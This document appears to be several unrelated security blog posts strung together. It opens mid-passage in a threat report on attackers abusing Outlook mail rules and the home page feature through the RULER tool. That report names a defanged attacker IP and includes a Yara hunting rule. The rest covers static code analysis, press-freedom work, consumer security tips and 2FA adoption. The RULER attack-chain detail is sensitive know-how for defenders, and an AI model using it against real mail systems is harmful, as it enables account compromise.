Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.

Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update


September 12, 2017 Security Update


October 10, 2017 Security Update


Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.



Endpoint Security


Network and Email Security

HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)


The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

Carnegie Mellon’s Software Engineering Institute Report Shows Efficacy of Static Application Security Testing

A new report from Carnegie Mellon University’s Software Engineering Institute shows that automated, integrated Static Analysis improves software quality, reduces development time, and makes software more reliable and secure. By incorporating application security testing throughout the entirety of the Software Development Lifecycle (SDLC), organizations are able to ensure the security and quality of its software, and increasing speed-to-market.

The findings stand in support of what our own data and customer practices have shown. In the State of Software Security Volume 9, analysis of Veracode’s application testing data found that development teams that implemented DevSecOps practices fixed flaws 11.5 times faster than typical organizations. While Nichols’ report does not include vendor comparisons, it does provide an overall analysis on the total benefits of a secure development approach. 

Development teams at three organizations were observed, with each team using both static code analysis (SCA) and static binary analysis (SBA). The teams each used these tools at different times in the SDLC, across multiple and varying projects. The study found that applying the tools added no additional effort for development teams prior to release, and that as developers sharpened secure coding skills, false positive rates declined with cleaner code. It further recommends that organizations build and automate static testing into their workflows across the SDLC, continue to apply human analysis to testing results to ensure quality.

Three Must-Have Solutions to Kick-Off Your Application Security Program

Building and maturing an application security program might seem like a daunting project, but getting started is simpler than you think. There is an established series of steps most organizations take when developing their programs. Here are the three solutions we recommend to get you started in securing your business-critical applications:

1.Veracode Greenlight: Deliver applications faster and meet your development timelines by writing secure code the first time around. Veracode Greenlight, an IDE or CI integrated continuous flaw feedback and secure coding education solution, returns scans in seconds, which helps developers discern whether their code is secure. This solution helps teams maintain development velocity, reduce the number of flaws introduced into an application, and strengthens secure coding skills and practices. Learn more.

2.Static Analysis: Veracode static analysis enables you to quickly identify and remediate application security flaws at scale and with efficiency. Our SaaS-based platform integrates with development and security tools to make testing a seamless part of your process. Once flaws are identified, teams can leverage in-line remediation advice and one-to-one coaching to reduce mean time resolve. Learn more.

3.Software Composition Analysis: While the report found that SAST wasn’t the strongest solution to reducing the risk of open source components, modern software composition analysis is. Today, applications are more often assembled from other sources, and in a typical application, we’re seeing some comprised of up to 90 percent third-party code. Veracode’s SCA uses real machine learning and natural language processing to identify potential vulnerabilities in open source libraries with a high level of accuracy. By understanding the status of the components within an application, and if a vulnerable method is being called, organizations can prioritize fixes based on the riskiest use of components and maintain their speed-to-market. Learn more.

Applications continue to be one of the top attack vectors for malicious actors, and while there is no application security silver bullet, we can help you implement automated techniques and manual processes to ensure that your applications are secure. To start creating more secure software today and learn more about how our solutions can help drive down application risk in your organization, contact us.

Freedom of the Press Foundation Releases its 2018 Annual Report

For anyone who cares about press freedom rights, it’s been a concerning year. In the United States, the president attacks journalists as “enemies of the people” on a weekly basis. Leak investigations targeting whistleblowers are at an all-time high. Journalists have been arrested and physically attacked covering protests at alarming rates. Abroad, the number of journalists being jailed is unprecedented.

But there is also reason to hope.

At Freedom of the Press Foundation, we are at the forefront of all these issues. While there are certainly a lot of battles ahead, it’s our job to equip journalists to face ever-changing threats in the 21st Century. While they face increasing dangers, they’ve also never been better prepared to handle them.

Help us sustain this important work with a donation by clicking here!

Without our supporters, our donors, and the brave journalists and whistleblowers who put their lives on the line, none of this would be possible.

We’re going to fight harder than ever in the coming year, and with your support, the public’s right to know will be stronger than ever.

Here’s a few highlights of what we accomplished in 2018:

SecureDrop: Over 75 major news organizations have installed SecureDrop, Our open source whistleblower submission system, in the U.S. and abroad. It has become a vital tool for outlets holding the Trump administration to account and getting vital information to the public.

Digital Security Trainings: Our digital security training team has conducted over 60 digital security trainings with media organizations, journalists, and documentary filmmakers, training over 1,200 journalists to better protect themselves online this year alone.

The U.S. Press Freedom Tracker: Since the launch of the U.S. Press Freedom Tracker in late 2017, FPF has documented 220 press freedom violations involving journalists and reporters.

Encryption Tools: Haven, an android app that acts as a security system, has been downloaded over 500,000 times since it's release.

Secure the News: News websites have an increasing obligation to protect the security and privacy of their readers, as well as their journalists and sources. Secure The News tracks the adoption of HTTPS encryption across major news websites and encourages them to adopt security practices that will protect journalists and readers alike. 86% of major news organizations now use HTTPS encryption by default, thanks to this advocacy campaign.

Archive the News: After Gothamist and DNAinfo were abruptly shut down, we built an open-source software tool enabling journalists to protect their work by saving an entire archive of their portfolios. In 2018, we created over 52,000 PDFs of articles for working journalists to include in their archives and writing portfolios.

The role of journalism in our democracy matters now more than ever and we are grateful for your support of our important work. Below is our complete annual report, outlining our projects and programs, highlights of the year, and expansion plans for 2019.

10+ Cyber Security Decisions You (and Me) Will Regret in The Future [Updated]

We may not realize it, but our daily routine habits have long-term effects. Some of them are positives, others could be on a negative note, but there is always at least one lesson to be learned. If you choose to eat healthy regularly, this habit will surely impact your lifestyle for the next years. If you read only a few pages of one book every day, you’ll see the world from different angles, enrich your vocabulary, and better understand people and the world we live in.

This applies to cybersecurity (decisions) as well. And let’s say that”within every decision, comes great responsibility.” Our daily habits we use in the digital landscape can impact greatly our future. If you are like me, you probably want to know that all your valuable digital assets such as photos, work-related documents, and files, apps, emails are in a safe and secure place.

I really hope you don’t have the widely-spread mindset “It can’t happen to me”, and assume you can’t become a victim. Cybercriminals don’t target only large organizations or institutions, everyone is exposed and can be vulnerable to all kind of cyber attacks. Is wrong to think that. We should take precautions to better secure our online identity.

With wise security choices come no regrets.

Did you know a recent report found that cyber attacks are in the top three risks for the society, along with natural disaster and extreme weather? 


You shouldn’t be surprised! The digital landscape doesn’t provide safety as we’d want it, or as we think it should (the “security by default” mentality). There are online threats with every click we take and we need to think about our online behavior seriously. It is essential to adjust our habits so that we can become our own layer of protection.

Don’t expose yourself and your valuable data out there and take security choices you’ll regret in the upcoming years.  Learn how to be resilient and easily detect online threats.

Apply these actionable security tips to enjoy safer digital experiences

  1. Do not share too much personal information on the Internet, because you can expose yourself to identity theft and imposter scams. For security reasons, it is better not to give full information such as birth date, address, the city of birth, phone number, share location when you are on vacation, or other sensitive and personal details that could expose your data.
  2. You may not realize it, but each time you check-in at home, at the airport, restaurant or any other public place, you become an easy target for malicious hackers. Who knows when you might get a visit from potential thieves? Once you expose your current location, attackers will know you’re on vacation and (most likely) rob you. For security and privacy matters, do not share your current location and provide as little information as possible about it while on the go.
  3. Also, don’t share photos of your credit card details on social channels, because hackers can find different ways to get access to your financial accounts. Food for thought: read these stories of people who share images of their credit cards on Twitter or Instagram.  You can easily get ripped off. “Sharing a picture online of your credit/debit card is a surefire way to have your details hacked.”
  4. Make sure that you don’t reveal your passwords to other people. Not even with your best friend or family members! The password is the key to access all your sensitive data stored on the email or other online accounts. Same applies to the working environment. You never know, but an insider threat could be next to you and can easily access sensitive data of your company. Make sure you block your computer each time you leave the office desk.
  5. We highly recommend changing your passwords regularly and set strong and unique passwords for your online accounts. Use this password guide to manage your passwords like an expert.
  6. Be careful when accepting random friends requests on FB from people you don’t know. You may be targeted by online scammers who want to collect data about users by creating fake Facebook profiles. If one of your friends send you a suspicious link, don’t click it, because it may redirect you to a malicious site and infect the PC with malware.
  7. Most of the spam campaigns usually take place via email, so we strongly advise you not to click or download any file or document attached that looks suspicious to you. Online criminals will always find innovative methods (like spoofing) to steal users’ sensitive data. Here’s how online scams work and how you can easily detect them.
  8. Don’t post private conversations without asking for permission in advance. Social media is a great place to interact and work with others, but many of us still have problems understanding how to use these platforms properly. Follow and use these specific netiquette rules. Remember that all messages you post on FB or other social media channels will remain there forever, because they store and collect data, and might affect you at some point. Always check your privacy and security settings for every social media platform you use and think twice before choosing how much data you want to make publicly accessible or keep it private.
  9. When you browse the Internet and search for something specific, you are not completely safe and you can infect your PC with malware or other online threats. Every browser has vulnerabilities that need to be fixed, so it is important to keep your browser up to date all the time and apply all patches available. This applies to all your plugins, add-ons or operating system. This step-by-step guide will show you how to get solid browser security.
  10. Education is always the key to stay safe online and be protected, and we strongly remind you to stay informed and learn from free educational resources.

We thought it might be useful to compile a list of 10 security decisions that can have an impact in the future. It can harm us more than we realize, so read them carefully. 🙂

Later edit: The list isn’t complete and we’ll keep updating it with more useful recommendations about security decisions that impact our lives.

Decision 1: Allowing someone else to dictate your security priorities

Here’s a piece of friendly advice: Don’t let someone else tell you how to prioritize your security problems! Make sure you understand your own needs and decide what security measures you should follow, in order to enhance online protection.

When it comes to cybersecurity priorities, it’s better (and wiser) not to rely on everyone who shares their views and opinions on digital safety. Do not be influenced by someone who tells you how to approach security matters. Instead, think of your own security challenges and prioritize them to better protect your valuable online assets.

Decision 2: Not focusing on educating yourself about cybersecurity

Probably one of the best investments for each of us is education. I sincerely believe that cybersecurity education is our best weapon to fight against today’s wave of cyber attacks. Education should be our core belief and main concern in keeping our valuable assets secure.

Cybersecurity education is the key to unlock a safer future and minimize the impact of cyber security incidents. Make sure you focus on spending more time and effort to learn as much as possible about the cybersecurity environment.

Why? Because the most successful cyber attacks aren’t just about technology but tied to the human error.

If you don’t know where to begin your learning path, have a look at these free educational resources that apply to anyone, no matter the background or skills level.

Decision 3: Reading cybersecurity resources with no actionable insights for you (and myself included)

What’s the point of reading cyber security online resources if you don’t apply the information found there? I know that a quick search on Google can generate lots of blogs and websites in this field. The big challenge comes when you need to filter and choose those valuable resources that can teach us actionable stuff.

I think we should start with a simple idea: your reading should be useful and actionable all the way through the journey in cybersecurity. You need it. We all need it. More than that, it’s essential to be ready for the future.

“Practical application of what you read reinforces what you’ve learned because you’re forced to integrate it into your life. If all you do is consume, you’re much more likely to forget what you read” said Srinivas Rao on Medium

As the author says, reading things we don’t actually apply to lead us to a “vicious cycle of excessive consumption which limits the creativity and prevents you from consuming less and creating more”.

If you want to read actionable cybersecurity resources, we’ve curated a list of Internet blogs and websites that could help you become savvier in info security.

Also, we asked security experts about books, and they’ve recommended some of the best educational cybersecurity books out there to read.

Decision 4: We don’t think of the security implications beyond our devices

After purchasing a device, – whether it is a desktop or mobile-, we don’t think of all the security implications too much. We are probably too excited about the cool features (and apps) included, and we miss this part.

We expose ourselves and our data by becoming more vulnerable to cyber attacks and easily prone to malware infection.

Everyone (myself included) believe that security is by default, and we don’t take the time to check all the existing settings.

I learned how my security decisions have a great impact on my future.
Click To Tweet

Here are some hands-on and actionable guides you may want to read for keeping your devices safe:

Smartphone security guide

Windows 10 Security Guide

How to Protect your PC with Multiple Layers of Protection

Decision 5: Not paying enough attention to the security software you install

When you look for a security software program, you’ll probably choose based on a recommendation from friends and family. This is a wise decision showing you care about your data. It is essential to add an extra layer of security to lower the risks of seeing your files and documents being stolen by hackers.

Depending on your budget, you could choose a free or paid security software to protect your digital assets. Also, make sure you pay enough attention to the product you’ll install, so you don’t have regrets afterward.

Why? Because in general we install software products on our devices with a few clicks and this is it. We forget about them. What we don’t do is:

  • Check for all the necessary system requirements;
  • Change default passwords;
  • Choose carefully and not investing in quality and legitimate products;
  • Check for built-in apps and all the software package included.

Independent software programs usually are packed with modules that constantly check for updates. Some have the auto-update feature built-in, while other program lets you do it manually. I recommend performing these updates that deliver revisions to your device (fixing major security vulnerabilities, removing and including new features).

Here’s what security experts say about the importance of software patching and why it’s an essential key factor for your online safety. Cultivate this healthy habit of checking and installing for updates as a part of your daily digital routine.

Also, remember that the longer your devices run without updates, the more exposed you are to data leakage and other cybersecurity threats.

Decision 6: Postponing data backups

I am sure you’re concern about your data like me, but postponing to backup of all your critical data is a choice we might regret in the future.

The longer we postpone this action, the more our data is vulnerable to attacks and prone to be lost unexpectedly. That’s why it is essential to have a copy of all your valuable data on external sources like a hard drive or in the cloud (Google Drive or Dropbox).

Here are the golden rules of data backup you should follow right now:

1. Keep at least 2 copies of your data.

2. Have backups on different external devices.

3. Maintain a constant, automated backup schedule of your files and documents.

4. Secure your backups with strong passwords and keep those passwords safe.

Therefore, for people like you and I, who can’t really spare that much time when it comes to backing up data, here’s a simple and actionable guide to follow.

Several security solutions offer backups for your computer data, and many of them will do this automatically and periodically. You can also create your own backups (and it won’t hurt to have multiple backups anyway). Just be disciplined in making sure you regularly do the backups so that if something should happen, the minimum amount of data is lost.

Decision 7: Not using two-factor authentication

A Google software engineer said during a security conference that less than 10 percent of active Google accounts use two-step authentication to enhance protection for their devices.

You may not give it too much importance now, but its main purpose is to make malicious actors’ life harder and reduce potential fraud risks. It will make it more difficult for cybercriminals to breach your account.

It’s nothing wrong with facing difficulties to understand new technologies. It’s wrong trying to ignore or postpone them because it will affect your online safety in the long run.

3 main reasons why should you use/activate two-factor authentication (2FA):

  • Passwords on their own aren’t as powerful as we believe they are, and can’t fully protect us. Cyber attackers have the power to try billions of passwords combinations and crack them instantly.
  • People tend to use the same password on different accounts and when online criminals succeed to crack it (via brute force attack), all your data will be exposed. Don’t do it! Set unique and strong passwords and consider using a password manager tool.
  • 2FA offers an extra layer of security and reduces cybercriminals’ chances to launch an attack. It’s hard for them to get through the second authentication factor.

Enabling two-factor authentication method is a must-have for all our email accounts, social media accounts, apps or online banking accounts. You can use this step-by-step guide to help you activate it for various online accounts. As for the passwords, do not reuse them for different online accounts.

Decision 8: Sharing too much personal information on social media

This is one of those security decisions you will definitely regret in the future. For privacy matters, do not to share your full personal data (birth date, address, the city of birth, phone number, or any other details on social accounts).

This way, you expose yourself to identify threats and most likely become more vulnerable to all types of online scams. Cybercriminals use social engineering techniques to exploit your data and get quick access to them.

Nothing beats learning from personal experience, but sometimes it’s better to learn from others’ experience rather than having a negative one. These true Internet stories could be an inspiration for you to take cyber security very seriously. Also, it doesn’t harm to be a little bit paranoid and protect your digital assets as everyone wants them.

Decision 9: Connecting to unprotected Wi-Fi networks

There is no news that Wi-fi networks come with a set of security issues. This allows malicious hackers to use Wifi sniffers and other methods to intercept almost all the data (such as emails, passwords, addresses, browsing history and even credit card data).

Before I started working in cybersecurity, I used to connect to every public and free Wi-fi network when visiting a coffee shop or restaurant. I learned not to do this anymore.

I realized (and understood) the security risks I was exposing myself and all my data by relying on Wi-fi networks. Now I turn it off :-).

This is one of those security decisions you’ll regret one day, so do your best and avoid Wi-fi connections that don’t provide password encryption when you’re enabling it. Cybercriminals can hack into a public Wi-Fi, just like this 7-year-old kid did.

To be extra safe on public Wi-fi, make sure you:

  • Visit and use only secure websites with the HTTPS protocol while browsing the Internet and, mostly, while doing various banking operations.
  • Consider using a Virtual Private Network (VPN) and block malicious actors’ attempt to access sensitive data sent over the unsecured Wi-Fi network.
  • Keep your operating system up to date and patch everything
  • Do not connect to a public Wifi without having antivirus software installed on your device.

Decision 10: Giving up on cybersecurity because it seems too complicated

For many of us, cybersecurity seems to be way too technical and difficult to approach, and for this reason, most users give up on understanding the basics of cybersecurity.

It gets confusing for regular users, but also for business owners, journalists, or people working or involved in cybersecurity. At some point, all parties involved think “why can’t security be simpler?”

Cybersecurity is complicated because life is complicated and there is no perfection. We can’t be a hundred percent secure – so the rhetoric and fear monger of vendors and security professionals has given in to a feeling of helplessness and disparity among the 80%. said Ian-Thornton-Trump on an expert roundup.

Decision 11: You do not check for reliable and trustworthy (re)sources 

We live in a world where we are overwhelmed with lots of information from every social network. We consume and have access to so much free content that it gets difficult (and challenging) to distinguish between fake and real news.  

While fake news is nothing new, disinformation can play a significant role in spreading and creating a fake reality that people (will) believe in. 

Every time we look for something and doing research on a specific topic, the information is right there, at one click distance. But how many of us are willing to go over the process of filtering and checking data? How do you know if it comes from trusted, high-quality sources? 

PRO TIP:  We strongly recommend to always fact-check other resources, and not rely solely on the first (re)source you find. Here are some useful tips that can provide actionable information on how you can better spot fake news. Also, it is important to combat them through user education, high-quality journalism, and always double-checking other resources. 

Each of us should be more aware of the long-term consequences of fake news, combat them, and invest in education to know how to better detect disinformation.

You can easily tackle it by attending a (free) cybersecurity course for beginners that will teach you how to improve your online safety. Once again, I emphasize the importance of education that can open and save digital lives.

The more we have a proactive cybersecurity defense, the safer we’ll be on the Internet where we can better combat the alarming wave of online threats. Cybercriminals don’t cease to surprise us with the various methods used during their cyber attacks.

Is any of these security decisions on your list to follow? What key factors influence your security decisions making? We are curious to know what you think of it, so feel free to share your thoughts.

The post 10+ Cyber Security Decisions You (and Me) Will Regret in The Future [Updated] appeared first on Heimdal Security Blog.

The bleak picture of two-factor authentication adoption in the wild

This post looks at two-factor authentication adoption in the wild, highlights the disparity of support between the various categories of websites, and illuminates how fragmented the two factor ecosystem is in terms of standard adoption.

Performing a longitudinal analysis highlights that the adoption rate of 2FA (two-factor authentication) has been mostly stagnant over the last five years, despite the ever increasing number of accounts hijacked due to the reuse of passwords found in data breaches and phishing attacks . Even more troublesome, looking at the type of 2FA offered reveals that some verticals, including some that have widely adopted 2FA, solely rely on custom two-factor solutions, instead of using two-factor standards, such as U2F/FIDO and TOTP .


Arguably, this behavior should be considered harmful to Internet ecosystem security, as it tends to create an unhealthy competition between sites to entice users to use different systems and install many apps. For example, as you can see in the screenshot above, HSBC and Blizzard Entertainment rolled their own proprietary two-factor software that requires you to install their app. They also use their own lingo and workflow e.g HSBC ask for a PIN to generate the TOTP code and call their software authenticator a secure key which is confusing to say the least. These practices certainly does not make it easy for users who have to learn the quirks of each system they enroll to.

In contrast, if every site were to use standardized two factors and a common language, once the users have installed a single app or bought U2F hardware dongles, they would be able to use them everywhere with a consistent user experience. In that ideal world, every site supporting 2FA would benefit from a virtuous snowball effect and user life would be a lot easier.

How we can help moving from the currently fragmented 2FA ecosystem to an ubiquitous standardized world is probably one of the greatest challenges that we face as a community.

The remainder of this blog post is organized as follows:

  • Methodology : How the data was collected and what are the study limitations.
  • 2FA prevalence : A summary of how widely deployed 2FA is across the ~1200 sites analyzed.
  • Adoption rate : A look at 2FA adoption rate over the last five years.
  • Adoption by vertical : Teasing apart 2FA adoption by industry vertical.
  • Type of 2FA offers : A delve into what type of 2FA (software, SMS, hardware, etc.) are the most commonly offered.
  • Standard adoption : How widely adopted U2F and TOTP are for the sites that are offering 2FA.

Before diving into the results, let me briefly describe how the data was collected and analyzed.


Dongle authentication

To establish how many sites offers 2FA (two-factor authentication) and what kind of second factors are offered in the wild, I pulled the list of sites offering 2FA from . To have historical perspective, I relied on the fact that the git repo has been active since 2014 and pulled the list of sites as it was after the last git commit of each year from 2014 until 2017. Finally, I wrote a few python scripts to aggregate their yaml files and compute the statistics needed to create the charts that are used in this post ( raw results available here ).

Study limitations

Among the main limitations of this approach, it is obvious that it is not systematic - ideally, we would go through all of the top 1,000 sites and manually verify if 2FA is available and, if so, in which format and what language is used. Similarly, the examples used through this post are anecdotal: I didn’t do a formal analysis of the language used to describe 2FA across all sites. Finally, while there are a lot of studies that show consumers are picky on what app they install, there is no user research that directly shows that users are unwilling to install all the security app that are needed.

Study goal

That being said, this blog post is meant to be a conversation starter and raise awareness, rather than a full-blown research paper. In that context, I would argue that the data presented in this blog, which is used to support its claims, are good enough as the issues are so widespread that they are obvious whichever way you look at them. In particular, looking at the database coverage for the 2015 old version of Alexa top 1000 sites (the recent one can’t be downloaded since Amazon bought it) shows that the database covers 40% of the top 100 domains and 23% of the top 500 - this is not perfect, but it is more than enough to spot trends.

Future work

Moving forward, I agree that the community would benefit from a more rigorous study with clear recommendations that can be used as a reference by CISOs, CTOs, policy makers, and other key opinion formers. It is something that I hope we can do in 2019 - so, if you are interested in contributing, drop me a note!

With this out of the way, let’s delve into the study results.

How prevalent is 2FA authentication?

Sites supporting 2FA

Overall, as of late 2018, 52.5% of the 1149 sites listed in the dongleauth database support 2FA. As we will see throughout this post, while having one site in two-supporting 2FA is good news, there is a lot of nuance behind this number that paints a somewhat grimmer picture.

Is 2FA adoption increasing?

2FA longitudinal support

To evaluate if the adoption rate of 2FA is increasing, I plotted the number of sites in the database at the end of every year since its inception (2014) and how many of those sites were marked as supporting 2FA. The resulting chart, visible above, shows that the trends don’t look great, while the number of sites supporting 2FA grew from 205 in 2014 to 603 in 2018 during the same period, the total number of sites in the database growing from 382 to 1149. This means that the ratio of sites supporting 2FA barely changed over the last four years: the adoption rate was 53.66% back in 2014, 48% in 2016, and back above 50% in 2017 (50.38%)

2FA adoption new vs existing sites

Now, one might argue that the main driver behind this stagnation is the fact that the dongleauth database grew by 300% over the last five years (~1200 up from 400) and that the newcomers are smaller/newer sites with less resources, which are, therefore, less likely to have 2FA. To test (and refute) this hypothesis,I looked at how much of the 2FA adoption growth was due to existing sites turning on 2FA. As visible in the chart above, turn out that very few sites that didn’t have 2FA from the get-go did adopt it after being added to the database. This leave us with the conclusion that:

In the recent year, the number of sites adopting 2FA has been mostly stagnant.

Understanding why sites don’t adopt 2FA and what can be done to incentivize them to do so are key questions that need to be answered, so that we can devise an effective global strategy that will ensure a steady adoption.

Support for various categories

2FA support per category

Looking at the adoption of 2FA by site categories reveals that FINTECH- (financial technologies) and IT (information technology)-related services, such as cryptocurrency and cloud services, are leading the 2FA adoption charge. The sites related to services that predated the Internet, such as utilities, food, and transports, unsurprisingly, have the lowest amount of adoption. The most concerning part of this breakdown is that a few categories of sites that handle very sensitive user data, such as education (40.9%) and health (21%), have a very low adoption rate. This highlights the need, as a community, to help those sites jump on the 2FA bandwagon to better protect their user data.

Type of second factor supported

Type of 2FA supported

Looking at the type of 2FA supported across the board reveals that software based 2FA is by far the most widely supported second factor, with 82.1% of the sites supporting 2FA offering it. SMS, with 45.6%, is a distant second and hardware token is third, with only a 36.2% adoption rate. This breakdown is probably best explained by the fact that software-token systems are easier to implement and have no operational cost, whereas sending SMS/offering a hardware token does.

Hardware 2FA keys

Obviously, the price argument is quickly becoming obsolete with the rise of the U2F hardware standard, as it allows any site to rely on security keys to do 2FA with a few lines of javascript . With webauthn and FIDO2 becoming mainstream in 2018, it will become easier than ever to offer a hardware 2FA. This is great news for user security, as U2F keys are the only type of second factor that can’t be phished, because the proof of ownership of the second factor is directly exchanged between the user key and the website.

The webauthn/FIDO2 standards will allow sites to offer unphishable hardware-based 2FA with just a few lines of javascripts.

However, all of this will only happen if sites indeed leverage standards and don’t invent their own version of second factors. This brings us to the last and probably most important part of the post, as it comes down to the future of 2FA: do websites follow standards?

2FA standard adoption

As I alluded to in the introduction, the key to getting more users to use 2FA is to have all sites offering two-factor options to be standardized. This would allow users to reuse their existing app and hardware tokens, instead of having sites competing to get users to install proprietary apps or buying single-site tokens (which is also bad for the planet).

The willingness of the industry to adopt standards is becoming even more crucial, as the next generation of hardware tokens FIDO2, which offer browser native UI, will hit the mainstream in 2019.

Before delving into adoption rate, let me briefly recap what standards exist and when they appeared, so that everyone is on the same page:

  • Software token: The industry standard for software-based 2FA are HTOP (“ HMAC based one time password ”) and TOTP (“ time-based one-time password ”). HOTP was standardized in the RFC 4226 in 2005 and TOTP in RFC 6238 in 2011 almost 10 years ago. The security risk associated with both protocol is that users need to input the code themselves which makes it phishiable. This security risk and ease of use what the driving reason for creating a hardware-based standard that didn’t requires user to input anything just touch a trusted device.

U2F key example

  • Hardware token: The standard for hardware tokens created by Google and Yubico is called U2F (universal second factor) and was released by the FIDO alliance in 2015. Its successor FIDO 2 developpement started in 2016. The main difference between U2F and FIDO2 is that FIDO2 has both a protocol to talk to hardware devices ( CTAP1 ) and a web API called webauthn that allows sites to use a native browser UI (as visible below) to prompt users to touch their key. Webauth is becoming mainstream with Chrome/Firefox/Edge support rolling out. You can test the native UI here .


Those standards, specially webauthn, offer the promise of a consistent user 2FA experience across the Internet, which, in the long run, is critical to having unphishiable accounts become the norm.

Standard overall adoption rate

2FA standard adoption rate

Having reusable two-factors tokens/apps and an Internet-wide consistent experience is only possible if sites adopt standards - this is why measuring adoption prevalence and tracking is so important. As you can see in the figure above, the current plot adoption rate of standards across the industry is pretty bleak - only 11% of the hardware tokens follow the U2F/FIDO standard and 26.8% of the TOTP one.

While the lack of U2F support can be explained by the fact that it is relatively new and was not supported by all major browsers, the lack of support for TOTP is more concerning. The protocol has been around for close to a decade, there are countless apps on Android and OSX that support it, yet barely one in four sites support it. This shows the resistance of the industry to adopt standards, and, thus, calls for a large community effort to get sites to adopt the standard.

Language disparity

Security key setup in Paypal

As pointed out by my friend Brad on top of not using standards, many websites use their own made-up language, which further increases user confusion about what to do for security. For example, as visible above, Paypal talk about registering the phone as security keys when it is in reality a SMS system. Twitter call 2FA login verification and Bank of America branded it SafePass and copyrighted the word… For more examples checkout the EFF article on the subject.

Adoption by industry

Adoption by Industry

Breaking down the HOTP/TOTP support by industry-type reveals that industries that predate the internet era are the ones that are the least likely to adopt the standards. This raises the question of how the security community can engage with those industries and encourage them to participate in 2FA standardization. The chart below shows that problems with the adoption rate for the U2F standard is as pervasive and suffer the same lack of support that HOTP/TOTP.

Follow U2F standards by Industry


To conclude, we are finally reaching the point where we have the technologies to offer users unphishable accounts with minimal friction and a consistent native UI across the Internet. It is up to us, as a community, to make sure that this doesn’t take 15 years to do, just like the deployment of HTTPS did. We need to engage the industry as a whole and get as many sites as possible, as quickly as possible, on the bandwagon to create a virtuous self-reinforcing circle, instead of a fragmented ecosystem.

A big thanks to Alexei , Aude, Brad and Christiaan for their feedback and insights -- this post wouldn’t be half as good without them.

Thank you for reading this blog post till the end! Don’t forget to share it, so your friends and colleagues can also learn about two factor authentication adoption in the wild. To get notified when my next post is online, follow me on Twitter , Facebook or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .

A bientôt!

A Short Cybersecurity Writing Course Just for You

My new writing course for cybersecurity professionals teaches how to write better reports, emails, and other content we regularly create. It captures my experience of writing in the field for over two decades and incorporates insights from other community members. It’s a course I wish I could’ve attended when I needed to improve my own security writing skills.

